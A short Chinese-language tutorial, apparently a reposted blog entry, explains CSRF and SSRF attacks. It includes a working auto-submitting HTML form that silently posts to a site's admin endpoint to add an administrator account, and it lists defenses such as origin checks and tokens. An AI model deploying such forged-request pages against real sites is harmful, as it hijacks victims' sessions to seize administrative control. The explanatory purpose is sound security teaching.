(一)什么是CSRF:一般指跨站请求伪造。跨站请求伪造(英语:Cross-site request forgery),也被称为 one-click attack 或者 session riding,通常缩写为 CSRF 或者 XSRF, 是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。 简单的说,就是让你去访问某不知名链接,然后你访问了,而且你那方面的环境也满足,就达到了攻击的效果。
(二)不知名链接:点开,链接里其实是攻击代码,点开后,代码被执行,如:
<html>
<head lang="en">
<title>csrf_post</title>
<script>
window.onload = function() {
document.getElementById("postsubmit").click();
}
</script>
</head>
<body>
<form action="http://47.94.236.117/admin/addadminuser.asp?action=add" method="POST">
<input type="text" name="username" value="xxxx"><br>
<input type="hidden" name="password" value="xx"><br>
<input type="hidden" name="password1" value="xxx"><br>
<input id="postsubmit" type="submit" name="submit" value="submit" />
</form>
</body>
</html>
(三)、环境:比如,你是网站管理员,然后你得要是处于登入状态,才能添加管理员账号,这个就是环境,这个时候攻击代码才能成功实现
(四)代码:攻击者要有相关网站的源码才能构造出相应的攻击代码呀,如果,添加管理员,要知道,添加管理员要写什么信息是吧,所以首先要有源码
(五)防护:同源策略:检查请求的来源进行防护
token:每次请求生成唯一的标识,这个很难被攻击者伪造
加验证码
(一)什么是ssrf:是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)
(二)场景:主要是用来进行内网探针,收集内网信息,也可请求相应服务器的资源
(三)权限:权限是根据相应脚本语言,读取文件,ftp什么的
(四)情况:还会有不会显的情况,后面会更新
原文:https://www.cnblogs.com/only-for-fun/p/14979032.html